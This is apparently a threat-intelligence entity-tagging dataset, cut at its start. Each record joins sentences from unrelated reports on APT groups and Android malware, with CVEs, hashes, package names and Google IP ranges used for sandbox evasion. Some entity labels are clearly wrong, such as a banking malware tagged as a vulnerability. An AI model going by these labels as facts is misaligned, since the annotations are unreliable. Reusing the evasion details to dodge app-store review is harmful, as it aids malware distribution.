Several of these provide enterprise services or cloud hosting , supporting our assessment that APT10 are almost certainly targeting MSPs .", "spans": [{"start": 69, "end": 80, "label": "System"}, {"start": 202, "end": 209, "label": "Organization"}, {"start": 282, "end": 291, "label": "Malware"}, {"start": 306, "end": 319, "label": "Vulnerability"}, {"start": 324, "end": 337, "label": "Vulnerability"}, {"start": 451, "end": 456, "label": "Organization"}, {"start": 488, "end": 492, "label": "Organization"}]} {"text": "Check Point reached out to Google on September 10 , 2015 , and the app containing the malware was removed from Google Play on September 15 , 2015 . One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . The 13th FYP was released in March 2016 and the sectors and organisations known to be targeted by APT10 are broadly in line with the strategic aims documented in this plan . These aims outlined in the FYP will largely dictate the growth of businesses in China and are , therefore , likely to also form part of Chinese companies ' business strategies .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 27, "end": 33, "label": "Organization"}, {"start": 111, "end": 122, "label": "System"}, {"start": 188, "end": 205, "label": "Organization"}, {"start": 234, "end": 264, "label": "Malware"}, {"start": 307, "end": 320, "label": "Vulnerability"}, {"start": 423, "end": 428, "label": "Organization"}, {"start": 565, "end": 575, "label": "Organization"}, {"start": 643, "end": 652, "label": "Organization"}]} {"text": "Overview The malware was first detected on a Nexus 5 smartphone , and although the user attempted to remove the infected app , the malware reappeared on the same device shortly thereafter . 
The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . APT10 has , in the past , primarily been known for its targeting of government and US defence industrial base organisations , with the earliest known date of its activity being in December 2009 .", "spans": [{"start": 45, "end": 52, "label": "System"}, {"start": 236, "end": 251, "label": "System"}, {"start": 266, "end": 281, "label": "Malware"}, {"start": 393, "end": 406, "label": "Vulnerability"}, {"start": 473, "end": 478, "label": "Organization"}, {"start": 541, "end": 551, "label": "Organization"}]} {"text": "Our analysis of the malware shows it uses multiple , advanced techniques to avoid Google Play malware detection and to maintain persistency on target devices . The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section . Observed APT10 targeting is in line with many of the historic compromises we have outlined previously as originating from China .", "spans": [{"start": 82, "end": 93, "label": "System"}, {"start": 164, "end": 178, "label": "Malware"}, {"start": 208, "end": 223, "label": "Vulnerability"}, {"start": 310, "end": 315, "label": "Organization"}]} {"text": "Once this malware was detected on a device , Mobile Threat Prevention adjusted security policies on the Mobile Device Management solution ( MobileIron ) managing the affected devices automatically , thereby blocking enterprise access from the infected devices . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . 
In line with commonly used APT actor methodologies , the threat actor aligns its decoy documents to a topic of interest relevant to the recipient .", "spans": [{"start": 45, "end": 69, "label": "System"}, {"start": 290, "end": 310, "label": "Organization"}, {"start": 352, "end": 385, "label": "Malware"}, {"start": 405, "end": 418, "label": "Vulnerability"}, {"start": 490, "end": 499, "label": "Organization"}, {"start": 544, "end": 559, "label": "Malware"}]} {"text": "While the malware is capable of facilitating various cyber-criminal goals , our team confirmed it \u2019 s currently installing additional apps on infected devices . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . This section details changes made to APT10 tools , techniques and procedures ( TTPs ) post-2014 , following its shift from Poison Ivy to PlugX .", "spans": [{"start": 178, "end": 191, "label": "Organization"}, {"start": 224, "end": 242, "label": "Organization"}, {"start": 314, "end": 340, "label": "Vulnerability"}, {"start": 380, "end": 385, "label": "Organization"}, {"start": 466, "end": 476, "label": "Malware"}, {"start": 480, "end": 485, "label": "Malware"}]} {"text": "Disturbingly , the malware establishes a rootkit on the device , allowing it to download and execute any code a cybercriminal would want to run on a device . PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . 
We have observed that in cases where APT10 has infiltrated a target via an MSP , it continues to use the MSPs credentials .", "spans": [{"start": 158, "end": 166, "label": "Organization"}, {"start": 240, "end": 260, "label": "Organization"}, {"start": 301, "end": 318, "label": "Vulnerability"}, {"start": 397, "end": 402, "label": "Organization"}, {"start": 435, "end": 438, "label": "Malware"}, {"start": 465, "end": 469, "label": "Organization"}]} {"text": "For example , it could be used to display unwanted and annoying advertisements on a device , or potentially , to download and deploy a payload that steals credentials from an infected device . The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . In order to gain any further credentials , APT10 will usually deploy credential theft tools such as mimikatz or PwDump , sometimes using DLL load order hijacking , to use against a domain controller , explained further in Annex B .", "spans": [{"start": 197, "end": 202, "label": "Organization"}, {"start": 276, "end": 296, "label": "Organization"}, {"start": 337, "end": 354, "label": "Vulnerability"}, {"start": 439, "end": 444, "label": "Organization"}, {"start": 496, "end": 504, "label": "Malware"}, {"start": 508, "end": 514, "label": "Malware"}, {"start": 533, "end": 557, "label": "Malware"}]} {"text": "Highlights Samples of the malicious code found in BrainTest have been found on Google Play , and its creator has used multiple methods to evade detection by Google including Bypassing Google Bouncer by detecting if the malware is being run from an IP or domain mapped to Google Bouncer and , if so , it will not perform its intended malicious activities . 
We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . APT10 achieves persistence on its targets primarily by using scheduled tasks or Windows services in order to ensure the malware remains active regardless of system reboots .", "spans": [{"start": 50, "end": 59, "label": "Malware"}, {"start": 79, "end": 90, "label": "System"}, {"start": 157, "end": 163, "label": "Organization"}, {"start": 184, "end": 198, "label": "System"}, {"start": 271, "end": 285, "label": "System"}, {"start": 376, "end": 384, "label": "Vulnerability"}, {"start": 451, "end": 460, "label": "Organization"}, {"start": 501, "end": 519, "label": "Organization"}, {"start": 543, "end": 552, "label": "Organization"}, {"start": 555, "end": 560, "label": "Organization"}, {"start": 616, "end": 631, "label": "Malware"}, {"start": 635, "end": 651, "label": "Malware"}]} {"text": "Combining timebombs , dynamic code loading , and use of reflection to complicate reverse engineering of the malware . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . For example , in addition to compromising high value domain controllers and security servers , the threat actor has also been observed identifying and subsequently installing malware on low profile systems that provide non-critical support functions to the business , and are thus less likely to draw the attention of system administrators .", "spans": [{"start": 118, "end": 126, "label": "Vulnerability"}, {"start": 194, "end": 202, "label": "Organization"}, {"start": 294, "end": 301, "label": "System"}]} {"text": "Using off-the-shelf obfuscation ( packer ) from Baidu to re-introduce the malware to Google Play after the first instance was removed on Aug 24th . 
However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . In the majority of instances APT10 used either a reverse shell or RDP connection to install its malware ; the actor also uses these methods to propagate across the network .", "spans": [{"start": 48, "end": 53, "label": "Organization"}, {"start": 85, "end": 96, "label": "System"}, {"start": 198, "end": 202, "label": "Organization"}, {"start": 236, "end": 244, "label": "Vulnerability"}, {"start": 274, "end": 283, "label": "Organization"}, {"start": 315, "end": 320, "label": "Organization"}, {"start": 335, "end": 348, "label": "Malware"}, {"start": 352, "end": 355, "label": "Malware"}, {"start": 396, "end": 401, "label": "Organization"}]} {"text": "BrainTest uses four privilege escalation exploits to gain root access on a device and to install a persistent malware as a system application . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . 
The tactical malware , historically EvilGrab , and now ChChes ( and likely also RedLeaves ) , is designed to be lightweight and disposable , often being delivered through spear phishing .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 20, "end": 49, "label": "Vulnerability"}, {"start": 144, "end": 148, "label": "System"}, {"start": 222, "end": 237, "label": "Organization"}, {"start": 240, "end": 259, "label": "Organization"}, {"start": 262, "end": 281, "label": "Organization"}, {"start": 352, "end": 361, "label": "Organization"}, {"start": 369, "end": 391, "label": "Vulnerability"}, {"start": 410, "end": 414, "label": "System"}, {"start": 461, "end": 469, "label": "Malware"}, {"start": 480, "end": 486, "label": "Malware"}, {"start": 505, "end": 514, "label": "Malware"}]} {"text": "BrainTest leverages an anti-uninstall watchdog that uses two system applications to monitor the removal of one of the components and reinstall the component . Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . Once executed , tactical malware contains the capability to profile the network and manoeuvre through it to identify a key system of interest .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 23, "end": 46, "label": "Vulnerability"}, {"start": 213, "end": 223, "label": "System"}, {"start": 244, "end": 257, "label": "Malware"}, {"start": 282, "end": 295, "label": "Vulnerability"}, {"start": 298, "end": 307, "label": "Vulnerability"}, {"start": 308, "end": 315, "label": "Vulnerability"}, {"start": 392, "end": 399, "label": "Organization"}]} {"text": "After the the first instance of BrainTest was detected , Google removed the app from Google Play . The Word document usually exploits CVE-2012-0158 . 
We have also observed APT10 use DLL search order hijacking and sideloading , to execute some modified versions of open-source tools .", "spans": [{"start": 32, "end": 41, "label": "Malware"}, {"start": 57, "end": 63, "label": "Organization"}, {"start": 85, "end": 96, "label": "System"}, {"start": 103, "end": 116, "label": "Malware"}, {"start": 134, "end": 147, "label": "Vulnerability"}, {"start": 172, "end": 177, "label": "Organization"}]} {"text": "Within days , the Check Point research team detected another instance with a different package name but which uses the same code . Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . For example , PwC UK has observed APT10 compiling DLLs out of tools , such as Mimikatz and PwDump6 , and using legitimate , signed software , such as Windows Defender to load the malicious payloads .", "spans": [{"start": 18, "end": 29, "label": "Organization"}, {"start": 145, "end": 154, "label": "Organization"}, {"start": 163, "end": 185, "label": "Malware"}, {"start": 211, "end": 224, "label": "Vulnerability"}, {"start": 241, "end": 247, "label": "Organization"}, {"start": 261, "end": 266, "label": "Organization"}, {"start": 305, "end": 313, "label": "Malware"}, {"start": 318, "end": 325, "label": "Malware"}, {"start": 351, "end": 366, "label": "Malware"}, {"start": 377, "end": 384, "label": "System"}]} {"text": "The malware \u2019 s creators had used obfuscation to upload the new piece of malware to Google Play . Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . 
During our analysis of victim networks , we were able to observe APT10 once again initiate a retooling cycle in late 2016 .", "spans": [{"start": 84, "end": 95, "label": "System"}, {"start": 108, "end": 117, "label": "Organization"}, {"start": 126, "end": 148, "label": "Malware"}, {"start": 174, "end": 187, "label": "Vulnerability"}, {"start": 255, "end": 260, "label": "Organization"}]} {"text": "Technical Analysis The malware consists of 2 applications : The Dropper : Brain Test ( Unpacked \u2013 com.mile.brain , Packed \u2013 com.zmhitlte.brain ) This is installed from Google Play and downloads an exploit pack from the server to obtain root access on a device . The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . We observed the deployment and testing of multiple versions of Quasar malware , and the introduction of the bespoke malware families ChChes and RedLeaves .", "spans": [{"start": 98, "end": 112, "label": "Indicator"}, {"start": 124, "end": 142, "label": "Indicator"}, {"start": 168, "end": 179, "label": "System"}, {"start": 291, "end": 298, "label": "Organization"}, {"start": 371, "end": 380, "label": "Malware"}, {"start": 395, "end": 408, "label": "Vulnerability"}, {"start": 413, "end": 426, "label": "Vulnerability"}, {"start": 508, "end": 514, "label": "Malware"}, {"start": 515, "end": 522, "label": "Malware"}, {"start": 578, "end": 584, "label": "Malware"}, {"start": 589, "end": 598, "label": "Malware"}]} {"text": "If root access is obtained , the application downloads a malicious .apk file ( The Backdoor ) from the server and installs it as system application . Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability . 
APT10 is a constantly evolving , highly persistent China-based threat actor that has an ambitious and unprecedented collection programme against a broad spectrum of sectors , enabled by its strategic targeting .", "spans": [{"start": 174, "end": 183, "label": "Organization"}, {"start": 199, "end": 212, "label": "Vulnerability"}, {"start": 346, "end": 359, "label": "Vulnerability"}, {"start": 376, "end": 381, "label": "Organization"}]} {"text": "The Backdoor : System malware ( mcpef.apk and brother.apk ) This tries a few persistence methods by using few anti-uninstall techniques ( described below ) and downloads and executes code from server without user consent . PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials . Since exposure of its operations in 2013 , APT10 has made a number of significant changes intended to thwart detection of its campaigns .", "spans": [{"start": 32, "end": 41, "label": "Indicator"}, {"start": 46, "end": 57, "label": "Indicator"}, {"start": 223, "end": 233, "label": "Organization"}, {"start": 259, "end": 283, "label": "Vulnerability"}, {"start": 372, "end": 377, "label": "Organization"}]} {"text": "Detailed Malware Structure Malware Structure com.mile.brain ( SHA256 : 135d6acff3ca27e6e7997429e5f8051f88215d12351e4103f8344cd66611e0f3 ) : This is the main application found on Google Play . They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . 
PwC UK and BAE Systems , working closely with industry and government , have uncovered a new , unparalleled campaign which we refer to as Operation Cloud Hopper .", "spans": [{"start": 45, "end": 59, "label": "Indicator"}, {"start": 71, "end": 135, "label": "Indicator"}, {"start": 178, "end": 189, "label": "System"}, {"start": 223, "end": 247, "label": "Vulnerability"}, {"start": 293, "end": 299, "label": "Organization"}, {"start": 304, "end": 315, "label": "Organization"}, {"start": 339, "end": 347, "label": "Organization"}, {"start": 352, "end": 362, "label": "Organization"}]} {"text": "It contains encrypted java archive \u201c start.ogg \u201d in the assets directory and dynamically loads code with dalvik.system.DexClassLoader . One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . This operation has targeted managed IT service providers , the compromise of which provides APT10 with potential access to thousands of further victims .", "spans": [{"start": 37, "end": 46, "label": "Indicator"}, {"start": 105, "end": 133, "label": "Indicator"}, {"start": 176, "end": 193, "label": "Organization"}, {"start": 222, "end": 252, "label": "Malware"}, {"start": 295, "end": 308, "label": "Vulnerability"}, {"start": 341, "end": 369, "label": "Organization"}, {"start": 405, "end": 410, "label": "Organization"}]} {"text": "do.jar ( SHA256 : a711e620246d9954510d3f1c8d5c784bacc78069a5c57b9ec09c3e234bc33a8b ) : The decrypted file that was created by \u201c start.ogg. \u201d It sends a request to the server with the device \u2019 s configuration . PittyTiger could also use CVE-2014-1761 , which is more recent . 
An additional campaign has also been observed targeting Japanese entities .", "spans": [{"start": 0, "end": 6, "label": "Indicator"}, {"start": 18, "end": 82, "label": "Indicator"}, {"start": 128, "end": 138, "label": "Indicator"}, {"start": 210, "end": 220, "label": "Organization"}, {"start": 236, "end": 249, "label": "Vulnerability"}]} {"text": "The server \u2019 s response is a json , containing a link to a .jar file , class name and method name to be executed with reflection API . PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts . APT10 's malware toolbox shows a clear evolution from malware commonly associated with China-based threat actors towards bespoke in-house malware that has been used in more recent campaigns ; this is indicative of APT10 's increasing sophistication , which is highly likely to continue .", "spans": [{"start": 135, "end": 143, "label": "Organization"}, {"start": 178, "end": 195, "label": "Vulnerability"}, {"start": 290, "end": 295, "label": "Organization"}, {"start": 396, "end": 402, "label": "Organization"}, {"start": 504, "end": 509, "label": "Organization"}]} {"text": "The application downloads the file and dynamically loads it using dalvik.system.DexClassLoader and invokes class and method specified in json . The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . 
The threat actor 's known working hours align to Chinese Standard Time ( CST ) and its targeting corresponds to that of other known China-based threat actors , which supports our assessment that these campaigns are conducted by APT10 .", "spans": [{"start": 137, "end": 143, "label": "Indicator"}, {"start": 190, "end": 205, "label": "System"}, {"start": 220, "end": 235, "label": "Malware"}, {"start": 347, "end": 360, "label": "Vulnerability"}, {"start": 578, "end": 584, "label": "Organization"}, {"start": 655, "end": 660, "label": "Organization"}]} {"text": "jhfrte.jar : This is a java archive file downloaded from server . When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . APT10 ( MenuPass Group ) is a Chinese cyber espionage group that FireEye has tracked since 2009 .", "spans": [{"start": 98, "end": 102, "label": "System"}, {"start": 105, "end": 113, "label": "Organization"}, {"start": 219, "end": 232, "label": "Vulnerability"}, {"start": 266, "end": 274, "label": "Organization"}, {"start": 348, "end": 353, "label": "Organization"}, {"start": 356, "end": 370, "label": "Organization"}, {"start": 413, "end": 420, "label": "Organization"}]} {"text": "If a device isn \u2019 t rooted , it downloads from the server an exploit pack and executes it to obtain root on device . The DLL exploited another previously unknown vulnerability ( designated CVE-2015-2546 ) in the Windows kernel , which enabled it to elevate privileges for the Word executable and subsequently install a backdoor through the application . Its targets include the military organizations and governments of countries with national interests in the South China Sea , including some within the U.S. 
defense industrial base .", "spans": [{"start": 121, "end": 124, "label": "System"}, {"start": 189, "end": 202, "label": "Vulnerability"}, {"start": 276, "end": 280, "label": "System"}, {"start": 378, "end": 400, "label": "Organization"}, {"start": 405, "end": 416, "label": "Organization"}, {"start": 510, "end": 533, "label": "Organization"}]} {"text": "Once root is obtained , it downloads an additional APK file from the server ( mcpef.apk ) and installs it as system application ( /system directory ) . When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . Moafee may have chosen its targets based on the rich resources of South China Sea region \u2013 the world 's second business sea-lane , according to Wikipedia \u2013 including rare earth metals , crude oil , and natural gas .", "spans": [{"start": 78, "end": 87, "label": "Indicator"}, {"start": 184, "end": 188, "label": "System"}, {"start": 299, "end": 312, "label": "Vulnerability"}, {"start": 346, "end": 354, "label": "Organization"}, {"start": 428, "end": 434, "label": "Organization"}, {"start": 620, "end": 623, "label": "Organization"}, {"start": 638, "end": 641, "label": "Organization"}]} {"text": "r1-r4 : This is a local privilege escalation ( root ) exploit , which includes : CVE-2013-6282 , camerageroot ( http : //www.77169.org/exploits/2013/20130414031700 ) , a rooting tool for mtk6592 and addtional exploit . 
In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves . DragonOK appears to operate out of China 's Jiangsu Province .", "spans": [{"start": 81, "end": 94, "label": "Vulnerability"}, {"start": 112, "end": 165, "label": "Indicator"}, {"start": 230, "end": 238, "label": "Organization"}, {"start": 256, "end": 273, "label": "Vulnerability"}, {"start": 508, "end": 525, "label": "Vulnerability"}, {"start": 577, "end": 594, "label": "Vulnerability"}, {"start": 608, "end": 616, "label": "Organization"}]} {"text": "nis : The su application used to execute shell commands with root privileges . PLATINUM has used several zero-day exploits against their victims . Moafee and DragonOK both use a well-known proxy tool \u2013 HUC Packet Transmit MAL ( HTRAN ) \u2013 to disguise their geographical locations .", "spans": [{"start": 79, "end": 87, "label": "Organization"}, {"start": 105, "end": 122, "label": "Vulnerability"}, {"start": 147, "end": 153, "label": "Organization"}, {"start": 158, "end": 166, "label": "Organization"}, {"start": 202, "end": 225, "label": "Malware"}, {"start": 228, "end": 233, "label": "Malware"}]} {"text": "mcpef.apk ( SHA256 : a8e7dfac00adf661d371ac52bddc03b543bd6b7aa41314b255e53d810931ceac ) : The malicious system application downloaded from server ( package name \u2013 com.android.music.helper ) . Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers . 
However , FireEye researchers do not have enough insight to reliably report a definitive connection to the Moafee and DragonOK groups .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 21, "end": 85, "label": "Indicator"}, {"start": 163, "end": 187, "label": "Indicator"}, {"start": 200, "end": 213, "label": "Vulnerability"}, {"start": 360, "end": 369, "label": "Organization"}, {"start": 382, "end": 389, "label": "Organization"}, {"start": 479, "end": 485, "label": "Organization"}, {"start": 490, "end": 505, "label": "Organization"}]} {"text": "This installs additional application from assets directory ( brother.apk ) and listens for PACKAGE_REMOVED events . For example , one zero-day vulnerability exploit ( CVE-2015-2545 ) used by PLATINUM was addressed immediately in September 2015 . Both Moafee and DragonOK favor spear-phishing emails as an attack vector , often employing a decoy to deceive the victim .", "spans": [{"start": 61, "end": 72, "label": "System"}, {"start": 134, "end": 156, "label": "Vulnerability"}, {"start": 167, "end": 180, "label": "Vulnerability"}, {"start": 191, "end": 199, "label": "Organization"}, {"start": 251, "end": 257, "label": "Organization"}, {"start": 262, "end": 270, "label": "Organization"}, {"start": 292, "end": 298, "label": "System"}]} {"text": "If brother.apk application is removed , mcpef.apk reinstalls brother.apk from assets . It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks . 
Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document .", "spans": [{"start": 3, "end": 14, "label": "System"}, {"start": 40, "end": 49, "label": "System"}, {"start": 61, "end": 72, "label": "System"}, {"start": 116, "end": 151, "label": "System"}, {"start": 218, "end": 235, "label": "Vulnerability"}, {"start": 412, "end": 423, "label": "Indicator"}]} {"text": "brother.apk ( SHA256 : 422fec2e201600bb2ea3140951563f8c6fbd4f8279a04a164aca5e8e753c40e8 ) : The package name \u2013 com.android.system.certificate . In 2016 , an attack campaign by this group was recorded in early May that made use of an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player , which at the time was both unknown and unpatched . We observed Moafee running HTRAN proxies on their multiple Command and Control ( C2 ) servers \u2013 all operated on CHINANET , and hosted in Guangdong Province .", "spans": [{"start": 0, "end": 11, "label": "System"}, {"start": 23, "end": 87, "label": "Indicator"}, {"start": 111, "end": 141, "label": "Indicator"}, {"start": 181, "end": 186, "label": "Organization"}, {"start": 245, "end": 258, "label": "Vulnerability"}, {"start": 364, "end": 370, "label": "Organization"}, {"start": 379, "end": 384, "label": "Malware"}, {"start": 433, "end": 435, "label": "System"}]} {"text": "System application installed by mcpef.apk . To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion . 
Like the Moafee group , we observed DragonOK running HTRAN to proxy their C2 servers , which are also operated on CHINANET but are hosted in the Jiangsu Province .", "spans": [{"start": 32, "end": 41, "label": "Indicator"}, {"start": 96, "end": 132, "label": "Vulnerability"}, {"start": 204, "end": 216, "label": "Organization"}, {"start": 231, "end": 239, "label": "Organization"}, {"start": 248, "end": 253, "label": "Malware"}, {"start": 269, "end": 271, "label": "System"}]} {"text": "This has the same functionality as mcpef.apk . However , around a month ago , Rocke started targeting systems that run Jenkins by attempting to exploit CVE-2018-1000861 and CVE-2019-1003000 . Primarily focused on governments and military operations of countries with interests in the South China Sea , Moafee likely chooses its targets based on region 's rich natural resources .", "spans": [{"start": 35, "end": 44, "label": "Indicator"}, {"start": 78, "end": 83, "label": "Organization"}, {"start": 152, "end": 168, "label": "Vulnerability"}, {"start": 173, "end": 189, "label": "Vulnerability"}, {"start": 213, "end": 224, "label": "Organization"}, {"start": 302, "end": 308, "label": "Organization"}]} {"text": "In addition , it monitors to verify if com.android.music.helper package is removed . The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites . 
By targeting high-tech and manufacturing operations in Japan and Taiwan , DragonOK may be acquiring trade secrets for a competitive economic advantage .", "spans": [{"start": 39, "end": 63, "label": "Indicator"}, {"start": 171, "end": 183, "label": "Vulnerability"}, {"start": 248, "end": 257, "label": "Organization"}, {"start": 262, "end": 275, "label": "Organization"}, {"start": 309, "end": 317, "label": "Organization"}, {"start": 367, "end": 375, "label": "Organization"}]} {"text": "If mcpef.apk is removed , brother.apk reinstalls it from a META-INF/brother file boy , post.sh : The shell scripts used for application persistency . In April , 2018 , the 360 Core Security takes the lead in capturing the APT-C-06 group\u2019s new APT attack using 0-day vulnerabilities (CVE-2018-8174) in the wild . Security researchers subsequently linked these attacks to a broader , yearlong campaign that targeted not just Israelis but Palestinians as well .", "spans": [{"start": 3, "end": 12, "label": "Indicator"}, {"start": 26, "end": 37, "label": "Indicator"}, {"start": 87, "end": 94, "label": "Indicator"}, {"start": 172, "end": 189, "label": "Organization"}, {"start": 222, "end": 230, "label": "Organization"}, {"start": 282, "end": 297, "label": "Vulnerability"}]} {"text": "Application lifecycle Application Lifecycle Google Bouncer Bypass On start , the application checks if it is executed on one of the Google servers : IP ranges 209.85.128.0-209.85.255.255 , 216.58.192.0-216.58.223.255 , 173.194.0.0-173.194.255.255 , 74.125.0.0-74.125.255.255 or if it is executed on IP hosted domain that contains the following strings : \u201c google \u201d , \u201d android \u201d , \u201d 1e100 \u201d . The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802) , and the ability to incorporate them into operations . and as discovered later , even the U.S. 
and UK governments .", "spans": [{"start": 44, "end": 58, "label": "System"}, {"start": 159, "end": 186, "label": "Indicator"}, {"start": 189, "end": 216, "label": "Indicator"}, {"start": 219, "end": 246, "label": "Indicator"}, {"start": 249, "end": 274, "label": "Indicator"}, {"start": 369, "end": 376, "label": "System"}, {"start": 397, "end": 402, "label": "Organization"}, {"start": 455, "end": 470, "label": "Vulnerability"}, {"start": 574, "end": 585, "label": "Organization"}]} {"text": "If any of these conditions is true , the application does not continue to execute the malicious flow . FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017 . The second group , known as DragonOK , targets high-tech and manufacturing companies in Japan and Taiwan .", "spans": [{"start": 103, "end": 110, "label": "Organization"}, {"start": 182, "end": 196, "label": "Vulnerability"}, {"start": 298, "end": 306, "label": "Organization"}, {"start": 317, "end": 326, "label": "Organization"}, {"start": 331, "end": 354, "label": "Organization"}]} {"text": "This method is designed to bypass the automatic Google Play protection mechanism called Bouncer . If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if it's vulnerable to EternalBlue , and uses it to spread to that host . 
In 2012 , the Molerats attacks appeared to rely heavily on the XtremeRAT , a freely available tool that is popular with attackers based in the Middle East .", "spans": [{"start": 48, "end": 59, "label": "System"}, {"start": 88, "end": 95, "label": "System"}, {"start": 169, "end": 188, "label": "System"}, {"start": 317, "end": 328, "label": "Vulnerability"}, {"start": 431, "end": 440, "label": "Malware"}, {"start": 488, "end": 497, "label": "Organization"}]} {"text": "Timebombs , Dynamic Code Loading and Reflection If Google Bouncer was not detected , the application starts a time bomb which initiates the malicious flow only after 20 seconds and will run every 2 hours . Tactic #1: Delivering the miner directly to a vulnerable server Some tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1) , and executing it using ShellExecute() . But the group has also used Poison Ivy ( PIVY ) , a RAT more commonly associated with threat actors in China \u2014 so much so that PIVY has , inaccurately , become synonymous with all APT attacks linked to China .", "spans": [{"start": 51, "end": 65, "label": "System"}, {"start": 317, "end": 331, "label": "Vulnerability"}, {"start": 345, "end": 355, "label": "System"}, {"start": 493, "end": 503, "label": "Malware"}, {"start": 506, "end": 510, "label": "Malware"}, {"start": 517, "end": 520, "label": "Malware"}, {"start": 558, "end": 564, "label": "Organization"}, {"start": 592, "end": 596, "label": "Malware"}]} {"text": "The time bomb triggers unpacker thread . We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. 
We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files .", "spans": [{"start": 95, "end": 103, "label": "Vulnerability"}, {"start": 151, "end": 162, "label": "Organization"}, {"start": 235, "end": 239, "label": "Malware"}, {"start": 463, "end": 478, "label": "Indicator"}]} {"text": "Unpacker thread decrypts java archive from assets directory \u201c start.ogg \u201d , and dynamically loads it and calls the method \u201c a.a.a.b \u201d from this archive . Figure 2: Zyklon attack flow Infection Techniques CVE-2017-8759 . We do not know whether using PIVY is an attempt by those behind the Molerats campaign to frame China-based threat actors for their attacks or simply evidence that they have added another effective , publicly-available RAT to its arsenal .", "spans": [{"start": 62, "end": 71, "label": "Indicator"}, {"start": 164, "end": 170, "label": "Organization"}, {"start": 204, "end": 217, "label": "Vulnerability"}, {"start": 249, "end": 253, "label": "Malware"}, {"start": 334, "end": 340, "label": "Organization"}, {"start": 438, "end": 441, "label": "Malware"}]} {"text": "This method checks if eight hours have passed from the first run of application , and if so , request containing the device \u2019 s data to the server . This vulnerability was discovered by FireEye in September 2017 , and it is a vulnerability we have observed being exploited in the wild . We observed several attacks in June and July 2013 against targets in the Middle East and the U.S. 
